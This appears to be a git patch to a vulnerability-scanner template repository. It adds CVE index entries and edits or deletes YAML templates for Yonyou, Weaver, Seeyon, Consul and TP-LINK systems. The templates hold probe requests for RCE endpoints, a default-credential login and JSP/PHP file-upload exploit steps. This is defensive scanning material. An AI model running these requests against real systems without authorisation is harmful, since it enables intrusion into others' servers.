 {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"}
 {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"}
 {"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"}
+{"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"}
 {"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"}
 {"ID":"CVE-2023-22480","Info":{"Name":"KubeOperator Foreground `kubeconfig` - File Download","Severity":"critical","Description":"KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22480.yaml"}
 {"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"medium","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"}
@@ -1916,6 +1917,7 @@
 {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"}
 {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
 {"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
+{"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"}
 {"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"}
 {"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"}
 {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"}
@@ -1939,6 +1941,7 @@
 {"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"}
 {"ID":"CVE-2023-2796","Info":{"Name":"EventON \u003c= 2.1 - Missing Authorization","Severity":"medium","Description":"The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-2796.yaml"}
 {"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"}
+{"ID":"CVE-2023-2813","Info":{"Name":"Wordpress Multiple Themes - Reflected Cross-Site Scripting","Severity":"medium","Description":"All of the above Aapna WordPress theme through 1.3, Anand WordPress theme through 1.2, Anfaust WordPress theme through 1.1, Arendelle WordPress theme before 1.1.13, Atlast Business WordPress theme through 1.5.8.5, Bazaar Lite WordPress theme before 1.8.6, Brain Power WordPress theme through 1.2, BunnyPressLite WordPress theme before 2.1, Cafe Bistro WordPress theme before 1.1.4, College WordPress theme before 1.5.1, Connections Reloaded WordPress theme through 3.1, Counterpoint WordPress theme through 1.8.1, Digitally WordPress theme through 1.0.8, Directory WordPress theme before 3.0.2, Drop WordPress theme before 1.22, Everse WordPress theme before 1.2.4, Fashionable Store WordPress theme through 1.3.4, Fullbase WordPress theme before 1.2.1, Ilex WordPress theme before 1.4.2, Js O3 Lite WordPress theme through 1.5.8.2, Js Paper WordPress theme through 2.5.7, Kata WordPress theme before 1.2.9, Kata App WordPress theme through 1.0.5, Kata Business WordPress theme through 1.0.2, Looki Lite WordPress theme before 1.3.0, moseter WordPress theme through 1.3.1, Nokke WordPress theme before 1.2.4, Nothing Personal WordPress theme through 1.0.7, Offset Writing WordPress theme through 1.2, Opor Ayam WordPress theme through 18, Pinzolo WordPress theme before 1.2.10, Plato WordPress theme before 1.1.9, Polka Dots WordPress theme through 1.2, Purity Of Soul WordPress theme through 1.9, Restaurant PT WordPress theme before 1.1.3, Saul WordPress theme before 1.1.0, Sean Lite WordPress theme before 1.4.6, Tantyyellow WordPress theme through 1.0.0.5, TIJAJI WordPress theme through 1.43, Tiki Time WordPress theme through 1.3, Tuaug4 WordPress theme through 1.4, Tydskrif WordPress theme through 1.1.3, UltraLight WordPress theme through 1.2, Venice Lite WordPress theme before 1.5.5, Viala WordPress theme through 1.3.1, viburno WordPress theme before 1.3.2, Wedding Bride WordPress theme before 1.0.2, Wlow WordPress theme before 1.2.7 suffer from the same issue about the search box reflecting the results causing XSS which allows an unauthenticated attacker to exploit against users if they click a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2813.yaml"}
 {"ID":"CVE-2023-2822","Info":{"Name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2822.yaml"}
 {"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"}
 {"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"}
@@ -2016,6 +2019,8 @@
 {"ID":"CVE-2023-39598","Info":{"Name":"IceWarp Email Client - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39598.yaml"}
 {"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"}
 {"ID":"CVE-2023-39676","Info":{"Name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","Severity":"medium","Description":"Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39676.yaml"}
+{"ID":"CVE-2023-39677","Info":{"Name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","Severity":"low","Description":"PrestaShop modules by MyPrestaModules expose PHPInfo\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39677.yaml"}
 {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
 {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
 {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
+{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 35ae0472be..9f87d95beb 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-0fa9dbb5fa304e174cf185b9d13b1a48
+818f0774f43e5b7487ecb8c71c473510

From b96825a29157bd2427c32a3db6337d72b4e9beaa Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Sun, 17 Sep 2023 21:41:07 +0530
Subject: [PATCH 0408/1090] updated templates

---
 http/cnvd/2021/CNVD-2021-30167.yaml.yaml      | 79 -------------------
 http/cnvd/2022/CNVD-2022-43245.yaml           |  4 +-
 http/cnvd/2023/CNVD-C-2023-76801.yaml         |  2 +-
 ....yaml => tplink-r470gp-default-login.yaml} | 11 +--
 .../other/consul-rexec-rce.yaml               | 34 --------
 .../other/consul-service-rce.yaml             | 35 --------
 .../qax/secsslvpn-auth-bypass.yaml            |  2 +-
 .../ruijie/ruijie-nbr-fileupload.yaml         |  3 +-
 .../secworld/secgate-3600-file-upload.yaml    |  2 +-
 .../seeyon/seeyon-oa-sp2-file-upload.yaml     |  4 +-
 .../smartbi/smartbi-deserialization.yaml      |  2 +-
 .../tongda/tongda-action-uploadfile.yaml      |  3 +-
 .../tongda/tongda-insert-sqli.yaml            | 17 +++-
 .../topsec-topapplb-arbitrary-login.yaml      | 36 ---------
 .../topsec/topsec-topapplb-auth-bypass.yaml   |  4 +-
 ...u-oa-teleconferenceservice-xxe-inject.yaml |  2 +-
 ...ecology-verifyquicklogin-auth-bypass.yaml} | 15 ++--
 .../weaver/weaver-e-cology-validate-sqli.yaml | 26 +++---
 .../weaver/weaver-e-mobile-rce.yaml           | 10 ++-
 .../weaver/weaver-ebridge-lfi.yaml            |  2 +-
 .../weaver-ecology-getsqldata-sqli.yaml       |  4 +-
 .../weaver/weaver-group-xml-sqli.yaml         |  6 +-
 .../weaver/weaver-jquery-file-upload.yaml     |  4 +-
 .../weaver-ktreeuploadaction-file-upload.yaml |  2 +-
 .../weaver-lazyuploadify-file-upload.yaml     |  4 +-
 .../weaver/weaver-login-sessionkey.yaml       |  4 +-
 .../weaver-office-server-file-upload.yaml     | 12 +--
 .../weaver/weaver-officeserver-lfi.yaml       |  4 +-
 .../weaver/weaver-uploadify-file-upload.yaml  |  2 +-
 .../weaver-uploadoperation-file-upload.yaml   |  6 +-
 .../yonyou/chanjet-gnremote-sqli.yaml         |  2 +-
 .../yonyou-filereceiveservlet-fileupload.yaml |  2 +-
 .../yonyou/yonyou-grp-u8-xxe.yaml             | 10 ++-
 .../yonyou-nc-grouptemplet-fileupload.yaml    |  4 +-
 .../yonyou/yonyou-u8-crm-fileupload.yaml      |  2 +-
 35 files changed, 94 insertions(+), 267 deletions(-)
 delete mode 100755 http/cnvd/2021/CNVD-2021-30167.yaml.yaml
 rename http/default-logins/tp-link/{tp-link-tl-r470gp-ac-default-login.yaml => tplink-r470gp-default-login.yaml} (77%)
 delete mode 100755 http/vulnerabilities/other/consul-rexec-rce.yaml
 delete mode 100755 http/vulnerabilities/other/consul-service-rce.yaml
 delete mode 100755 http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
 rename http/vulnerabilities/weaver/{weaver-e-cology-verifyquicklogin-arbitrary-login.yaml => ecology-verifyquicklogin-auth-bypass.yaml} (72%)

diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml.yaml
deleted file mode 100755
index 9a8826fc47..0000000000
--- a/http/cnvd/2021/CNVD-2021-30167.yaml.yaml
+++ /dev/null
@@ -1,79 +0,0 @@
-id: yonyou-nc-bshservlet-full-check
-
-info:
-  name: yonyou-nc-bshservlet-full-check
-  author: SleepingBag945
-  severity: critical
-  description: 测试所有BshServlet RCE端点
-  reference:
-    - https://github.com/parkourhe/yongYouNC-RCE/blob/master/poc.txt
-  tags: yonyou,nc
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/servlet/~aim/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~alm/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~ampub/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~arap/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~aum/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~cc/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~cdm/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~cmp/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~ct/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~dm/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~erm/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~fa/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~fac/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~fbm/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~ff/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~fip/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~fipub/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~fp/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~fts/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~fvm/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~gl/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~hrhi/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~hrjf/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~hrpd/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~hrpub/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~hrtrn/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~hrwa/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~ia/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~ic/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~iufo/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~modules/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~mpp/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~obm/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~pu/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~qc/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~sc/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~scmpub/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~so/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~so2/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~so3/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~so4/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~so5/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~so6/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~tam/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~tbb/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~to/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~uap/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~uapbd/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~uapde/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~uapeai/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~uapother/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~uapqe/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~uapweb/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~uapws/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~vrm/bsh.servlet.BshServlet"
-      - "{{BaseURL}}/servlet/~yer/bsh.servlet.BshServlet"
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "BeanShell Test Servlet"
-      - type: status
-        status:
-          - 200
diff --git a/http/cnvd/2022/CNVD-2022-43245.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml
index d2288c9132..8c24236126 100755
--- a/http/cnvd/2022/CNVD-2022-43245.yaml
+++ b/http/cnvd/2022/CNVD-2022-43245.yaml
@@ -28,12 +28,12 @@ http:
     matchers:
       - type: word
         part: body
-        words :
+        words:
           - ""
 
       - type: word
         part: header
-        words :
+        words:
           - "text/xml"
 
       - type: status
diff --git a/http/cnvd/2023/CNVD-C-2023-76801.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml
index 109fe81cce..dac7a8f899 100644
--- a/http/cnvd/2023/CNVD-C-2023-76801.yaml
+++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml
@@ -17,7 +17,7 @@ http:
         {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
         "parameterTypes":["java.lang.Object","java.lang.String"],
         "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}
-      
+
       - |
         GET /{{randstr_1}}.jsp HTTP/1.1
         Host: {{Hostname}}
diff --git a/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml b/http/default-logins/tp-link/tplink-r470gp-default-login.yaml
similarity index 77%
rename from http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml
rename to http/default-logins/tp-link/tplink-r470gp-default-login.yaml
index 236ef6136b..72a22019ca 100755
--- a/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml
+++ b/http/default-logins/tp-link/tplink-r470gp-default-login.yaml
@@ -1,14 +1,14 @@
 id: tp-link-tl-r470gp-ac-default-login
 
 info:
-  name: TP-LINK TL-R470GP-AC Default weak password
+  name: TP-LINK TL-R470GP-AC - Default Login
   author: SleepingBag945
   severity: high
   description: |
     TP-LINK TL-R470GP-AC 默认口令123456
   metadata:
     fofa-query: title="TL-R470GP-AC"
-  tags: tp-link,default-login,ac
+  tags: tp-link,default-login,router
 
 http:
   - raw:
@@ -17,18 +17,13 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json; charset=UTF-8
         X-Requested-With: XMLHttpRequest
-        Connection: close
 
         {"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}}
 
-
-    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - "\"stok\""
           - "\"error_code\":0"
-        condition: and
-
-
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/other/consul-rexec-rce.yaml b/http/vulnerabilities/other/consul-rexec-rce.yaml
deleted file mode 100755
index 921c957519..0000000000
--- a/http/vulnerabilities/other/consul-rexec-rce.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: consul-rexec-rce
-
-info:
-  name: Consul Rexec RCE
-  author: SleepingBag945
-  severity: critical
-  description: |
-    Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
-  metadata:
-    fofa-query: protocol="consul(http)"
-  tags: rce
-
-http:
-  - raw:
-      - |
-        GET /v1/agent/self  HTTP/1.1
-        Host: {{Hostname}}
-
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '"EnableRemoteScriptChecks":true'
-        condition: and
-
-      - type: status
-        status:
-          - 200
-
-
-# msf
-# search Hashicorp
-# exploit/multi/misc/consul_service_exec
\ No newline at end of file
diff --git a/http/vulnerabilities/other/consul-service-rce.yaml b/http/vulnerabilities/other/consul-service-rce.yaml
deleted file mode 100755
index 1b1cf8626e..0000000000
--- a/http/vulnerabilities/other/consul-service-rce.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: consul-service-rce
-
-info:
-  name: consul-service-rce
-  author: SleepingBag945
-  severity: critical
-  description: |
-    Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
-  metadata:
-    fofa-query: protocol="consul(http)"
-  tags: rce
-
-http:
-  - raw:
-      - |
-        GET /v1/agent/self  HTTP/1.1
-        Host: {{Hostname}}
-
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "\"EnableScriptChecks\": true"
-          - "\"EnableRemoteScriptChecks\": true"
-        condition: or
-
-      - type: status
-        status:
-          - 200
-
-
-# msf
-# search Hashicorp
-# exploit/multi/misc/consul_service_exec
\ No newline at end of file
diff --git a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
index c18d32766c..e5ac882c42 100755
--- a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
+++ b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
@@ -2,7 +2,7 @@ id: secsslvpn-auth-bypass
 
 info:
   name:  Secure Access Gateway SecSSLVPN - Authentication Bypass
-  author: SleepingBag945  
+  author: SleepingBag945
   severity: high
   description: |
     The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability.
diff --git a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
index b79048fe2f..593ee80e26 100644
--- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
@@ -1,5 +1,4 @@
 id: ruijie-nbr-fileupload
-  
 info:
   name: Ruijie NBR fileupload.php - Arbitrary File Upload
   author: SleepingBag945
@@ -28,7 +27,7 @@ http:
         Content-Type: image/jpeg
 
         
-      
+
       - |
         GET /ddi/server/upload/{{filename}}.php HTTP/1.1
         Host: {{Hostname}}
diff --git a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
index 807bde2465..707562c31c 100644
--- a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
+++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
@@ -57,7 +57,7 @@ http:
     matchers-condition: and
     matchers:
       - type: dsl
-        dsl: 
+        dsl:
           - status_code_2 == 200
           - contains(body_2,'{{file-upload}}')
           - contains(header_2,'text/html')
diff --git a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
index 82f2f6d75b..391c58ed0f 100755
--- a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
+++ b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
@@ -27,11 +27,11 @@ http:
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
         Accept-Encoding: gzip
-        
+
         --59229605f98b8cf290a7b8908b34616b
         Content-Disposition: form-data; name="upload"; filename="{{filename}}.xls"
         Content-Type: application/vnd.ms-excel
-        
+
         <% out.println("{{string}}");%>
         --59229605f98b8cf290a7b8908b34616b--
 
diff --git a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
index 117851a77f..d15db6c37e 100755
--- a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
+++ b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
@@ -1,7 +1,7 @@
 id: smartbi-deserialization
 
 info:
-  name: Smartbi windowunloading Interface - Deserialization 
+  name: Smartbi windowunloading Interface - Deserialization
   author: SleepingBag945
   severity: high
   description: |
diff --git a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
index 33ebd44c35..7253a8ede3 100755
